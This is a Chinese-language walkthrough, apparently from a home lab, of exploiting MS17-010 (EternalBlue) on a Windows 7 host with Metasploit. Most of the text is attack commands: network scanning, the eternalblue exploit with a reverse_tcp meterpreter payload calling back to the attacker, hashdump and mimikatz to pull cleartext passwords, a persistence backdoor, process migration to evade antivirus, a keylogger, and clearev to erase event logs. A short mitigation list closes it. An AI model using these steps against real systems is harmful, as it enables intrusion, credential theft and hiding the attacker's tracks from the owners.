實驗環境
客戶機(win7 ip:192.168.0.105)
攻擊機(kali ip:192.168.0.101)
具體步驟
查看局域網設備
使用netdiscover 查看局域網的設備

如上圖所示,搜索到了一臺IP為192.168.0.103的設備
使用 nmap 掃描
root@WHOAMI:~# nmap -sS -A -p- -v -O 192.168.0.103
-sS 半開掃描
-A 全面系統檢測、啟用腳本檢測、掃描等
-p- 掃描全部開放的端口
-v 顯示掃描過程,
-O 啟用遠程操作系統檢測,存在誤報
掃描結果如下圖


發現目標機器開放的端口還有windows 7操作系統
對主機進行掃描確認是否存在漏洞
msf5 > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.0.103
msf5 auxiliary(scanner/smb/smb_ms17_010) > run

上圖中出現- Host is likely VULNERABLE to MS17-010!說明客戶機存在MS17-010漏洞下面開始漏洞利用
msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.0.103
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.0.101
msf5 exploit(windows/smb/ms17_010_eternalblue) > run

連接成功

查看權限
meterpreter > getuid

查看登錄的用戶的明文密碼
使用命令 run hashdump 加載 hashdump 模塊

使用命令 load mimikatz 加載 mimikatz 模塊,再使用 help mimikatz

使用 wdigest 命令獲取登錄過的用戶儲存在內存里的明文密碼

查看分區
run post/windows/gather/forensics/enum_drives

查看補丁信息

給 win7 留后門
使用命令 run persistence -X -i 10 -r 192.168.0.101 -p 444

再開啟一個 msf
加載 handler 模塊
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.0.101
msf5 exploit(multi/handler) > set LPORT 444
msf5 exploit(multi/handler) > run
如下圖成功在444端口監聽到一個會話

Metasploit 鍵盤記錄
ps查看進程

將meterpreter當前的進程移動到其他指定的進程中,這樣做的好處是可以給meterpreter一個相對穩定的運行環境,同時可以很好的躲避殺毒軟件

最后,我們啟動鍵盤記錄器,等待一段時間并轉儲輸出。

清除痕跡
在滲透入侵的過程中難免會留下一下日志信息痕跡,我們可以使用此命令來擦除留下的痕跡
使用clearev

解決措施
·及時打補丁
·安裝殺毒軟件自動更新補丁